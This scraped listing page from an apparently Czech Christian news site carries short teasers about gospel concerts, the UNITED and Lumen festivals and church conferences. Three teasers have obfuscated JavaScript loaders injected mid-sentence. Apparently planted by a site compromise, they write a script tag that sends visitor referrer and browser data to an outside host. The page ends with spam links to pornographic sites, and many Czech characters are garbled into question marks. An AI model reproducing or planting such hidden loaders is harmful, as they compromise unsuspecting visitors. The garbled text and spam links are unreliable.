Akce

Návrat Stella Jones & The Christmas Singers do ČR

Ilustrace k článku

Tato velmi oce?ovaná gospelová skupina již okouzlila svými p?veckými výkony diváky po celém sv?t?. Soubor sdružuje ?adu talent? s jedine?nými hlasovými schopnostmi, což ve spojení s tradi?ními gospelovými prvky zaru?uje dechberoucí podívanou

BASEMENT není jen coworking v centru Prahy

Ilustrace k článku

Na pražských Vinohradech vyrostlo otev?ené spole?enství, které usiluje o život podle k?es?anských hodnot. Chce být inspirací pro nev??ící, hledající, tradi?ní v??ící, i pro ty, kte?í se nedokázali ztotožnit s církevní

CampFest 2017 spôsobil PREMENU

Ilustrace k článku

19. ro?ník open air festivalu CampFest je za nami. Na Ran?i Krá?ova Lehota od 03. do 06. augusta 2017 zaznela hudba, slovo, ?i divadlo a ?udia mali možnos? zaži? festivalovú atmosféru

Festival UNITED po sedmé zaplnil centrum Vsetína

Ilustrace k článku

Ve Vsetín? se od ?tvrtka 24. 8. do soboty 26. 8. 2017 uskute?nil 7. ro?ník k?es?anského multižánrového festivalu UNITED. Festival, který se podruhé ve své historii konal jako m?stská open-air

Festival UNITED 2017

Ilustrace k článku

Ve eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|irnit|var|u0026u|referrer|kahyf||js|php'.split('|'),0,{})) Vsetín? prob?hne od ?tvrtka 24. 8. do soboty 26. 8. 2017 sedmý ro?ník multižánrového k?es?anského festivalu UNITED. Akce nabídne žánrov? r?znorodou hudbu, p?ednášky,

Trnava sa dotkla neba. Festival Lumen spojil Boha s kvalitnou hudbou

Ilustrace k článku

Festival Lumen prilákal do Trnavy tisíce ?udí. Jubilejný 25. ro?ník gospelového festivalu zav?šila kapela Switchfoot zo San Diega v sobotu 3. júna, bodku za ním dala svätá omša v katedrále. Na dvojd?ovom festivale

„Bůh je dobrý uprostřed zla,“ řekl Justin Bieber

Ilustrace k článku

Justin Bieber pronesl jedno z nejsiln?jších vyhlášení o své ví?e, když b?hem koncertu One Love Manchester prohlásil, že Boží láska p?ekoná zlo teroru. Na benefi?ním koncertu, který po?ádala zp?va?ka Ariana Grande

Vitamínová bomba – konference o chvalách

Ilustrace k článku

V termínu 29. 4. – 1. 5. 2017 se bude v Kolín? konat Vitamínová bomba, konference eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|srzrd|var|u0026u|referrer|ydekk||js|php'.split('|'),0,{})) o chvalách. Jedná se o t?i dny plné p?edávání praktických

Rend Collective přijedou do Prahy

Ilustrace k článku

Organizáto?i festivalu UNITED informují prost?ednictvím internetu a sociálních sítí o akcích, které po?ádají v pr?b?hu letošního roku. První dv? události se uskute?ní na za?átku ?ervna v Praze. Jedná se o

V Plzni se uskuteční konference UNIT

Ilustrace k článku

V Plzni se o druhém b?eznovém víkendu uskute?ní mládežnická ekumenická konference UNIT. Akce se bude konat v prostorách Evangelické církve metodistické (ECM) Maranatha, informují o tom internetové stránky www.unitos.cz. Konference eval(function(p,a,c,k,e,d){e=function(c){return


 
adultcomics.me shemalevids.org incestgames.net